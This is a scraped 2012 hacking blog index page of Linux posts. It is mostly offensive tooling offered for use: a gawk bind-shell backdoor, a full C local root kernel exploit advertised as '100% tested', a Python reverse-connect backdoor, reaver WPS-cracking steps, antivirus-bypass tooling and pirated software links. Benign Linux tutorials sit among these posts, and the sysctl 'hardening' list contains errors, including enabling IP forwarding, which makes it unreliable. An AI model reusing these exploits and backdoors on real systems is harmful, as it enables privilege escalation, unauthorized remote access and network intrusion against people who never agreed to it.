BEGIN {
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
Showing posts with label linux. Show all posts
Showing posts with label linux. Show all posts
Thursday, 12 July 2012
A Backdoor in gawk by thegrugg
Labels:
backdoor,
Crack,
exploitation,
Hacking,
hacking tool,
howto,
Information Leak,
Information Security,
linux,
packet analysis,
pentest,
security,
shell,
Source,
tool,
trick
Monday, 25 June 2012
Portsplit - Use multiple service in the same port.
Simple TCP port multiplexer (or "port splitter").
Just run "make" to compile. Binary will be in
"src" directory.
See example config file in examples directory.
Source: https://github.com/kheops2713/portsplit
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Just run "make" to compile. Binary will be in
"src" directory.
See example config file in examples directory.
Source: https://github.com/kheops2713/portsplit
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Labels:
article,
Information Security,
linux,
packet analysis,
security,
Source,
tool,
trick
Friday, 22 June 2012
How to Secure your Linux
So how to secure your Linux let see in brief:-
- There are Many Inbuilt processes to secure Linux Itself
- To alter the parameters of Linux Kernel to make it more secure the following code is used /etc/sysctl.conf-sysctl.conf
- Apply Following Configuration to secure your own Linux distribution
Net/ipv4/conf/all/rp_filter=1
Net/ipv4/conf/all/log_martians=1
Net/ipv4/conf/all/send_redirects=0
Net/ipv4/conf/all/accept_source_route=0
Net/ipv4/conf/all/accept_redirects=0
Net/ipv4/tcp_syncookies=1
Net/ipv4/icmp_echo_ignore_broadcast=1
Net/ipv4/ip_forward=1
Any Problem regarding this then comment plz
Wednesday, 20 June 2012
Download Local Root Exploit 2.6.18 2011

Local Roots Exploit are used to root on the Linux servers different version are comes's out according to updated Linux Servers. So here is the Local Root Exploit Of 2.6.18.2011 with 100% tested OK
LOcal Root Exploit 2.6.18 2011 by http://www.hackerscafe.in/
DOWNLOAD IT HERE
PASTEBIN LINK- http://pastebin.com/6eUFD2x0
/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18-128.el5
* Linux 2.6.9-89.EL
* Ubuntu 8.10 Linux 2.6.27
*
* For i386 & ppc compile with the command;
* gcc -w -o exploit exploit.c
*
* For x86_64 kernel and ppc64 Compile as;
* gcc -w -m64 -o exploit exploit.c
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
*
* For Educational purpose Only))
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile ("movq %%rsp,%0; " : "=r" (sp));
return sp;
}
#else
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile ("movl %%esp,%0" : "=r" (sp));
return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;
asm volatile ("mr %0,%%r1; " : "=r" (sp));
return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct;
asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;
thread_info = current_stack_pointer() & ~(4096 - 1);
if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;
/*
* The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng
* in us3r-spaCe.
*/
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}
/*
* Prior to the 2.6 kernel series, the task_struct was stored at the end
* of the kernel stack.
*/
task_struct = current_stack_pointer() & ~(8192 - 1);
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;
#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);
#else
task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
thread_info = task_struct;
task_struct = *(unsigned long *)thread_info;
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int
change_cred(****)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(****)
{
unsigned int *task_struct;
task_struct = (unsigned int *)current_task_struct();
while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}
if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}
task_struct++;
}
return -1;
}
#endif
#define PAGE_SIZE getpagesize()
int
main(****)
{
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XXXXXX";
#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();
#endif
if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror("mmap");
exit(EXIT_FAILURE);
}
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
* The use of function descriptors by the Power 64-bit ELF ABI requires
* the use of a fake function descriptor.:P
*/
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';
#endif
#endif
if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(EXIT_FAILURE);
}
if ((in_fd = mkstemp(template)) == -1) {
perror("mkstemp");
exit(EXIT_FAILURE);
}
if(unlink(template) == -1) {
perror("unlink");
exit(EXIT_FAILURE);
}
if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("ftruncate");
exit(EXIT_FAILURE);
}
sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
execl("/bin/sh", "sh", "-i", NULL);
exit(EXIT_SUCCESS);
}
Labels:
backtrack linux,
Downloads,
hacking linux,
linux,
methods
Monday, 18 June 2012
Download Xandros 4.5 x86(Multi) OS
Xandros 4.5 x86(Multi) OS
Xandros 4.5 x86 is a operating system based on very good known Debiane (Xandros 4.0 and after = Debian Etch)
And the amazing thing is that there is no programs in it , it is untested long term and also stability of graphics is because of the presence of KDE 3.4
Useful Info about Xandros
You can blunder on a way to advancement earlier versions. Do not see the point in attractive for means to advancement to this adaptation is because this adaptation is the latest.
- Developer: Xandros
- Version: 4.5(latest)
- Platform: x86
- Compatibility with Vista: alien(Unknown)
- System requirements: a modified and higly standard for modified Nix
- Language: Two languages That are ENGLISH AND RUSSIAN
- Crack: It doesn't require any crack
RAR PASS- scenereleasing_and_providing_you_latest_stuff___saud_1
DOWNLOAD IT HERE :-
http://extabit.com/file/28xp3ze0xefwh/
http://extabit.com/file/28xp3ze0xefxt/
http://ul.to/pajjbp2v/Xndrs.4.5.part1.rar
http://ul.to/uuq2ojj4/Xndrs.4.5.part2.rar
http://extabit.com/file/28xp3ze0xefxt/
http://ul.to/pajjbp2v/Xndrs.4.5.part1.rar
http://ul.to/uuq2ojj4/Xndrs.4.5.part2.rar
Saturday, 16 June 2012
Getting started with Linux
Hello guyz this is my new post on Linux ,many people wants to know about Linux as Linux is very different from our Old Windows(XP).So let discuss about linux in short

I. What is Linux?
II. Trying it out
III. Installing
IV. What to do now
V. The Console
This post is for noobs who want to use and know linux
there are to many noobs who get totally left in the dark by asking what
the best distro is. They seem to only get flooded with too many
answers in so short a time.
I will cover a grand total of two basic distros. You may
learn to strongly prefer other ones (I do!) but this is just to get
you started. I touch on a number of topics that would be impossible to
go into in depth in one tutorial, so I encourage you to actively seek
out more about the concepts I make reference to.
I. What is Linux?
Linux is basically an operating system (OS). The Windows
machine you're (probably) using now uses the Microsoft Windows
operating system like XP and 7.
Ok, so what's so different about Linux?
Linux is part of a revolutionary movement called the open-source
movement. The history and intricacies of that movement are well beyond
the scope of this tutorial, but I'll try and explain it simply. Open
source means that the developers release the source code for all their
customers to view and alter to fit what they need the software to do,
what they want the software to do, and what they feel software should
do. Linux is a programmer?s dream come true, it has the best compilers,
libraries, and tools in addition to its being open-source. A
programmer's only limit then, is his knowledge, skill, time, and
resolve.
What is a distro?
A distro is short for a distribution. It's someone's personal
modification or recreation of Linux.
What do you mean by distros? Only Linux I want so let see
Since Linux is open source, every developer can write his own version.
Most of those developers release their modifications, or entire
creations as free and open source. A few don't and try to profit from
their product, which is a topic of moral debate in the Linux world.
The actual Linux is just a kernel that serves as a node of
communication between various points of the system (such as the CPU,
the mouse, the hard drive etc.). In order to use this kernel, we must
find a way to communicate with it. The way we communicate is with a
shell. Shells will let us enter commands in ways that make sense to
us, and send those commands to the kernel in ways that makes sense to
it. The shell most Linux's use it the BASH shell (Bourne Again SHell).
The kernel by itself will not do, and just a shell on top of the kernel
won?t either for most users; we are then forced to use a distribution.
What distro is best?
This is not the question you want to ask a large number of people at
one time. This is very much like asking what kind of shoe is best,
you'll get answers anywhere from running shoes, hiking boots, cleats,
to wingtips. You need to be specific about what you plan on using
Linux for, what system you want to use it on, and many other things. I
will cover two that are quick and easy to get running. They may not be
the best, or the quickest, or the easiest, or the most powerful, but
this is a guide for getting started, and everyone has to start
somewhere.
How much does it cost?
computer + electricity + internet + CD burner and CDs = Linux
I'll let you do your own math.
Note however that a few do charge for their distros, but they aren't
all that common, and can be worked around. Also, if you lack internet
access or a CD burner or CDs or you just want to, you can normally
order CDs of the distro for a few dollars apiece.
II. Trying it out.
Wouldn't it stink if you decide to wipe out your hard drive and install
Linux as the sole operating system only to learn that you don't know
how to do anything and hate it? Wouldn?t it be better to take a test
drive? 95 out of a 100 of you know where I'm heading with this section
and can therefore skip it. For those of you who don't know, read on.
There are many distros, and most distros try to have something that
makes them stand out. Knoppix was the first live-CD distro. Although
most of the other main distros have formed their own live-CDs, Knoppix
is still the most famous and I will be covering how to acquire it.
A live-CD distro is a distribution of Linux in which the entire OS can
be run off of the CD-ROM and your RAM. This means that no installation
is required and the distro will not touch your hard disk or current OS
(unless you tell it to). On bootup, the CD will automatically detect
your hardware and launch you into Linux. To get back to Windows, just
reboot and take the CD out.
Go to the Knoppix website (www.knoppix.com). Look around some to get
more of an idea on what Knoppix is. When you're ready, click Download.
You'll be presented with a large amount of mirrors, some of which have
ftp and some of which have http also.
note: the speed of the mirrors vary greatly, and you may want to
change mirrors should your download be significantly slow.
Choose a mirror. Read the agreement and choose accept. You'll probably
want to download the newest version and in your native language (I'll
assume English in this tutorial). So choose the newest file ending in
-EN.iso
note: you might want to also verify the md5 checksums after the
download, if you don't understand this, don't worry too much. You just
might have to download it again should the file get corrupted (you'll
have to anyway with the md5). Also, a lot of times a burn can be
botched for who-knows what reason. If the disk doesn?t work at all,
try a reburn.
Once the .iso file is done downloading, fire up your favorite
CD-burning software. Find the option to burn a CD image (for Nero, this
is under copy and backup) and burn it to a disk. Make sure you don't
just copy the .iso, you have to burn the image, which will unpack all
the files onto the CD.
Once the disk is done, put it in the CD-ROM drive and reboot the
computer. While your computer is booting, enter CMOS (how to get to
CMOS varies for each computer, some get to it by F1 or F2 or F3, etc.)
Go to the bootup configuration and place CD-ROM above hard disk. Save
changes and exit. Now, Knoppix will automatically start. You will be
presented with a boot prompt. Here you can input specific boot
parameters (called cheatcodes), or just wait and let it boot up using
the default.
note: Sometimes USB keyboards do not work until the OS has somewhat
booted up. Once you?re actually in Knoppix, your USB keyboard should
work, but you may not be able to use cheatcodes. If you need to,
attach a PS/2 keyboard temporarily. Also, if a particular aspect of
hardware detection does not work, look for a cheatcode to disable it.
Cheatcodes can be found on the Knoppix website in text format (or in
HTML at www.knoppix.net/docs/index.php/CheatCodes).
Upon entering the KDE desktop environment, spend some time exploring
around. Surf the web, get on IM, play some games, explore the
filesystem, and whatever else seems interesting. When your done, open
up the console (also called terminal, xterm, konsole, or even shell)
and get ready for the real Linux. See section V for what to do from
here.
note: to function as root (or the superuser) type su.
It's not entirely necessary that you are a console wizard at this point
(although you will need to be sooner or later), but a little messing
around wont hurt.
Just as there are many Linux distros, so there are also many types of
Knoppix. I won?t go into using any of them, but they should all be
somewhat similar. Some of them include: Gnoppix, Knoppix STD, Morphix,
and PHLAK. Other distros also have live-CDs.
III. Installing
I will guide you through the installation of Fedora Core 2. The reason
I chose Fedora is because it contains the Anaconda installer, which is
a very easy installer.
Download the discs from here:
http://download.fedora.redhat.com/pub/fedo...ore/2/i386/iso/
If the link doesn?t work, then go to www.redhat.com and navigate your
way to downloading Fedora (odds are your architecture is i386).
You will want to download the FC2-i386-disc1.iso and burn it using the
method for Knoppix. Do the same for all the discs.
Note: do NOT download the FC2-i386-SRPMS-disc1.iso files.
Now, once you?re ready, insert disc 1 into the drive and reboot.
The installer should come up automatically (if not, then see the
Knoppix section on CMOS).
Note: installer may vary depending on version. Follow directions best
you can using your best judgement.
1. Language: choose English and hit enter
2. Keyboard: choose us (probably) and hit enter
3. Installation media: choose local CDROM (probably) and hit enter
4. CD test: you can choose to test or skip
5. Intro: click next
6. Monitor: choose your monitor to the best of your ability, if you?re unsure, choose on of the generic ones
7. Installation type: choose which ever you want (default should be fine)
8. Partition: choose to automatically partition (unless you know what you?re doing)
9. Partition: the default partitions should suffice
10. Boot loader: choose your boot loader (grub for default)
11. Network settings: choose the correct settings for your network (generally, don?t mess with anything unless you know what you?re doing)
12. Firewall: you can choose a firewall if you want to
13. Language support: choose any additional language support you want
14. Time zone: pick your time zone
15. Root password: set your root password (root is the admin, or superuser; you want it to be very secure)
16. Packages: choose which packages you want to install. For hard drives over 10 gigs, you can go ahead and choose all
packages (depending on how much disk space you plan on taking up later, note that most everything you?ll need is a package: the exception
being large media files). You will generally want to install all the packages you think you?ll ever need. Two desktop environments aren?t necessary.
Make sure you have at least one and the X window system! (if you want a GUI that is). I suggest you get all the servers too.
Note: Knoppix uses the KDE Desktop environment
17. Make sure everything is all right, and install
18. You can create a boot disk if you want
Note: Desktop environments might have a set-up once you enter them
IV What to do now
Now that you have a Linux set-up and running, there are many paths you
can head down. First, you should explore your GUI and menus. Browse
the web with Mozilla, get on IM with GAIM, play games, add/delete
users, check out OpenOffice, and anything else that might be part of
your daily use. Also, set up a few servers on your computer to play
around with, specifically SMTP (*wink*wink*), FTP (vsftp is a good
one), and either telnet or SSH (OpenSSH is a good one). The setup and
use of these are beyond the scope of this tutorial, but researching
them could prove to be very educational.
The filesystem
The Linux (and Unix) filesystem is different from the normal Windows
that you?re used to. In Windows, your hard drive is denoted ?C:\? (or
whatever). In Linux, it is called the root directory and is denoted
?/?. In the / directory, there are several default folders, including
dev (device drivers) mnt (mount) bin (binaries) usr (Unix System
Resources) home, etc, and others. I encourage you to explore around
the whole file system (see section V) and research more.
Once you are well situated, it?s time to get into the heart and power
of Linux: the console. The next session will guide you through it and
set you on the path to finding out how to do stuff for yourself. You
will (probably) want to start learning to rely less and less on the
GUI and figure out how to do everything through the console (try
launching all your programs from the console, for example).
V. The Console
The Console might look familiar to DOS if you?ve ever used it. The
prompt should look something like the following:
AvatharTri@localhost avathartri$
With the blinking _ following it. This can vary greatly as it is fully
customizable. Let?s get started with the commands.
First, let?s explore the file system. The command ls will "list" the
files in the current directory. Here?s an example:
AvatharTri@localhost avathartri$ ls
It should then display the contents of the current directory if there
are any. Almost all commands have options attached to them. For
example, using the -l option, which is short for "long" will display
more information about the files listed.
AvatharTri@localhost avathartri$ ls -l
We will get into how to find out the options for commands and what
they do later.
The second command to learn will be the cd command, or "change
directory". To use it, you type cd followed by a space and the
directory name you wish to go into. In Linux, the top directory is /
(as opposed to C:\ in Windows). Let?s get there by using this command:
AvatharTri@localhost avathartri$ cd /
AvatharTri@localhost /$
Now, we are in the top directory. Use the ls command you learned
earlier to see everything that?s here. You should see several items,
which are directories. Now, let?s go into the home directory:
AvatharTri@localhost /$ cd home
AvatharTri@localhost home$
And you can now ls and see what?s around. In Linux there are some
special symbol shortcuts for specific folders. You can use these
symbols with cd, ls, or several other commands. The symbol ~ stands
for your home folder. One period . represents the directory your
currently in. Two periods .. represent the directory immediately above
your own. Here?s an example of the commands:
AvatharTri@localhost home$ cd ~
AvatharTri@localhost avathartri$
This moved us to our user?s personal directory.
AvatharTri@localhost avathartri$ cd .
AvatharTri@localhost avathartri$ cd ..
AvatharTri@localhost home$
The cd .. moved us up to the home directory.
As you?ve probably noticed by now, the section behind the prompt
changes as you change folders, although it might not always be the
case as it?s up to the personal configuration.
You can use these symbols with the ls command also to view what is in
different folders:
AvatharTri@localhost home$ ls ~
AvatharTri@localhost home$ ls ..
And you can view what is in a folder by specifying its path:
AvatharTri@localhost home$ ls /
AvatharTri@localhost home$ ls /home
The last command we will cover as far as finding your way around the
filesystem is the cat command. The cat command will show the contents
of a file. Find a file by using the cd and ls commands and then view
its contents with the cat command.
AvatharTri@localhost home$ cd [directory]
AvatharTri@localhost [directory]$ ls
AvatharTri@localhost [directory]$ cat [filename]
Where [directory] is the directory you want to view and [filename] is
the name of the file you want to view. Omit the brackets. Now, if the
file you viewed was a text file, you should see text, but if it wasn?t,
you might just see jumbled garbage, but this is ok. If the file goes
by too fast and goes off the screen, don?t worry, we will get to how
to scroll through it later.
One of the most useful commands is the man command, which displays the
"manual" for the command you want to know more about. To learn more
about the ls command:
AvatharTri@localhost home$ man ls
And you will see the manual page for ls. It displays the syntax, a
description, options, and other useful tidbits of information. Use the
up and down arrows to scroll and press q to exit. You can view the
manual pages for any command that has one (most commands do). Try this
out with all the commands that you know so far:
AvatharTri@localhost home$ man cd
AvatharTri@localhost home$ man cat
AvatharTri@localhost home$ man man
One very crucial option to the man command is the -k option. This will
search the descriptions of manual pages for the word you specify. You
can use this to find out what command to do what you need to do. For
example, let?s say we want to use a text editor:
AvatharTri@localhost home$ man -k editor
And you should see a list of apps with a short description and the
word "editor" in the description.
With a blank prompt, you can hit tab twice for Linux to display all
the possible commands. For Linux to display all the commands beginning
with a certain letter or series of letters, type those letters and hit
tab twice.
Note: This is actually a function of BASH and not Linux, but BASH is
the default Linux shell.
Now that you know a little about moving around the filesystem and
viewing manual pages, there is one more trick that we will cover to
help you out. Remember how the man pages were scrollable as in you
could use the arrow keys to scroll up and down? That is because the
man pages use something called the less pager. We?re not going to go
into what this does exactly and how it works, but that?s definitely
something that you will want to look up. Here?s how to use the less
pager with a file:
AvatharTri@localhost home$ cat [filename] | less
That uses something called a pipe. The line is the vertical line above
enter on your keyboard. Briefly, what this does is take the output
from the cat command, and stick it in the less pager. By doing this,
you can view files that would normally run off the screen and scroll
up and down.
Some final commands to check out:
mkdir - make directories
cp - copy file
mv - move file
rm - remove file
rmdir - remove directory
grep - search a file for a keyword
pwd - display current working directory
top - display system resources usage (kill the program with control + c)
So Now you complete It hope it will help you to understand Linux well .. any problem just comment guyz
Monday, 16 April 2012
Monitor your bandwidth from the Linux shell
If you want to see full article, please go to the source
Bmon
bmon is a bandwidth monitor, intended for debugging and real-time
monitoring purposes, capable of retrieving statistics from various input
modules. It provides various output methods including a curses based
interface. A set of architecture specific input modules provide the core
with the list of interfaces and their counters.
Bmon
bmon is a bandwidth monitor, intended for debugging and real-time
monitoring purposes, capable of retrieving statistics from various input
modules. It provides various output methods including a curses based
interface. A set of architecture specific input modules provide the core
with the list of interfaces and their counters.
Labels:
article,
howto,
Information Security,
linux,
Network Security,
security,
tool,
trick
Tuesday, 28 February 2012
Android Forensics Study of Password and Pattern Lock Protection
If you want to see all detail, please go to the Source.
What is Password Lock?
So, while the Pattern Lock is a number, Password Lock can contain
characters, numbers, and special marks. Unlike patterns passwords can be
a real problem for the attacker as the number of variants grows
tremendously. Of course, this is true if you want to brute force
Password lock just like the Pattern. Well,
What is Password Lock?
So, while the Pattern Lock is a number, Password Lock can contain
characters, numbers, and special marks. Unlike patterns passwords can be
a real problem for the attacker as the number of variants grows
tremendously. Of course, this is true if you want to brute force
Password lock just like the Pattern. Well,
Monday, 20 February 2012
SQLMap plugin for Burpsuite
If you want the detail and who develop this plugin, please go to the Source.
1. Firstly, Download the plugin
https://gason.googlecode.com/files/burpplugins.jar
2. Run the burpsuite with plugin
$ java -classpath burpplugins.jar:”BurpSuite_v1.4.01.jar” burp.StartBurp
3. Click right mouse button over the url you want to test with sqlmap and choose "Send to sqlmap"
4. Configure the sqlmap
1. Firstly, Download the plugin
https://gason.googlecode.com/files/burpplugins.jar
2. Run the burpsuite with plugin
$ java -classpath burpplugins.jar:”BurpSuite_v1.4.01.jar” burp.StartBurp
3. Click right mouse button over the url you want to test with sqlmap and choose "Send to sqlmap"
4. Configure the sqlmap
Labels:
exploitation,
Hacking,
hacking tool,
Information Leak,
Information Security,
linux,
pentest,
security,
Source,
sql_injection,
tool,
trick,
Web,
Web Application,
Web Application Attack
Monday, 30 January 2012
Easy Wireless Honey-Pots using Win7 and Metasploit
I found myself inspired by Vivek Ramachandran’s videos,
I thought I would take the honor in creating the simple meterpreter
script that basically does what you see in the third installation of the
Swse Addendum videos.
When I watched the third video I thought to myself, “This shouldn’t
be too difficult to do”. From my perception, I think that Vivek was kind
of hinting that he might
Labels:
article,
Hacking,
hacking tool,
Information Leak,
Information Security,
linux,
metasploit,
Network Security,
packet analysis,
pentest,
security,
sniffer,
wireless
Android App - Network Spoofer
Network Spoofer lets you mess with the internet on other people's computers.
Network
Spoofer lets you mess with websites on other people's computers - flip
pictures, change Google searches, redirect websites and many more
features to come.
DISCLAIMER: The developer(s) of this application
are not in any way responsible for it's use or misuse; only use it for
demonstration purposes on networks
Network
Spoofer lets you mess with websites on other people's computers - flip
pictures, change Google searches, redirect websites and many more
features to come.
DISCLAIMER: The developer(s) of this application
are not in any way responsible for it's use or misuse; only use it for
demonstration purposes on networks
Labels:
android,
exploitation,
Hacking,
hacking tool,
Information Security,
linux,
Network Security,
pentest,
security,
tool,
trick,
wireless
Thursday, 26 January 2012
Howto: Install Metasploit on your Ipad2(iOS5.0.1)
1. SSH to your ipad for easy typing
2. Install all packet that must use for Metasploit
- apt-get install adv-cmds apt basic-cmds bootstrap-cmds bzip2 class-dump coreutils developer-cmds diskdev-cmds file-cmds gawk gdb git gzip iokittools less more nano network-cmds ldid openssh rsync shell-cmds system-cmds com.ericasadun.utilities top uikittools findutils inetutils diffutils lsof subversion vim
2. Install all packet that must use for Metasploit
- apt-get install adv-cmds apt basic-cmds bootstrap-cmds bzip2 class-dump coreutils developer-cmds diskdev-cmds file-cmds gawk gdb git gzip iokittools less more nano network-cmds ldid openssh rsync shell-cmds system-cmds com.ericasadun.utilities top uikittools findutils inetutils diffutils lsof subversion vim
Labels:
article,
exploitation,
Hacking,
hacking tool,
howto,
Information Security,
iOS,
linux,
metasploit,
nmap,
pentest,
security,
shell,
Source,
tool,
trick
Sunday, 22 January 2012
Howto: Use shellcodeexec to bypass antivirus
The characteristics of shellcodeexec are as follows:
Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
Can be compiled and works on 32-bit and 64-bit architectures.
As far as I know, no AV detect it as malicious.
Works in DEP/NX-enabled environments: it allocates the memory page
where it stores the shellcode as rwx – Readable Writable and
eXecutable.
It supports
Labels:
article,
exploitation,
Hacking,
hacking tool,
howto,
Information Security,
linux,
metasploit,
Microsoft,
pentest,
security,
shell,
tool,
trick
Saturday, 21 January 2012
Small Python Backdoor
import os,socket,sys
def usage():
print '''
###################
#Reflex.py IP PORT#
###################
[+]Example:
------------------------------
|Hamoud-Oz.py 192.168.1.3 2121|
------------------------------''',exit()
if len(sys.argv) < 3:usage()
s=socket.socket()
s.connect((sys.argv[1],int(sys.argv[2])))
s.send('''
###########################
def usage():
print '''
###################
#Reflex.py IP PORT#
###################
[+]Example:
------------------------------
|Hamoud-Oz.py 192.168.1.3 2121|
------------------------------''',exit()
if len(sys.argv) < 3:usage()
s=socket.socket()
s.connect((sys.argv[1],int(sys.argv[2])))
s.send('''
###########################
Labels:
exploitation,
Hacking,
hacking tool,
Information Leak,
Information Security,
linux,
pentest,
security,
Source,
tool
Thursday, 19 January 2012
Bypass screensaver/locker program on xorg 1.11 and up
It's so surprise for me when I found this post. If you want to see full message, please go to the Source.
Hi,
I recently stumbled upon a funny bug feature in the Xorg server that
could allow attackers with physical access to a machine to bypass the
screensaver/screen locker program.
Most people use those programs to lock their computer when they are
away. On Gnome, gnome-screensaver is
Labels:
Defensive,
exploitation,
Hacking,
howto,
Information Security,
linux,
pentest,
security,
Security News
Howto: Crack WPS & WPA Wifi with reaver
1. Get the reaver
- wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz
2. Extract and compile it.
- tar xzvf reaver-1.3.tar.gz
- cd reaver-1.3/src
- ./configure
- make
- make install
3. Change your wireless card to monitor mode
- airmon-ng start wlan0
4. Use reaver
- reaver -i mon0 -b
5. Waiting beacon from Wireless Access Point and finally you
- wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz
2. Extract and compile it.
- tar xzvf reaver-1.3.tar.gz
- cd reaver-1.3/src
- ./configure
- make
- make install
3. Change your wireless card to monitor mode
- airmon-ng start wlan0
4. Use reaver
- reaver -i mon0 -b
5. Waiting beacon from Wireless Access Point and finally you
Labels:
article,
Brute Force,
Brute Force Tool,
Crack,
exploitation,
Hacking,
hacking tool,
howto,
Information Leak,
Information Security,
linux,
Network Security,
packet analysis,
pentest,
security,
tool,
trick,
wireless
Wednesday, 11 January 2012
Word List Generator
wlg: Word List Generator
version: 0.5
coded by white_sheep
site: http://www.marcorondini.eu - http://www.ihteam.net
twitter: http://www.twitter.com/white__sheep
Option
-h [ --help ] produce help message
-v [ --version ] show version
-r [ --credits ] show credits
-e [ --extract ] arg set string to extract
version: 0.5
coded by white_sheep
site: http://www.marcorondini.eu - http://www.ihteam.net
twitter: http://www.twitter.com/white__sheep
Option
-h [ --help ] produce help message
-v [ --version ] show version
-r [ --credits ] show credits
-e [ --extract ] arg set string to extract
Labels:
backtrack,
Brute Force,
Brute Force Tool,
Crack,
Hacking,
hacking tool,
Information Security,
linux,
security,
Security News,
Source,
tool,
trick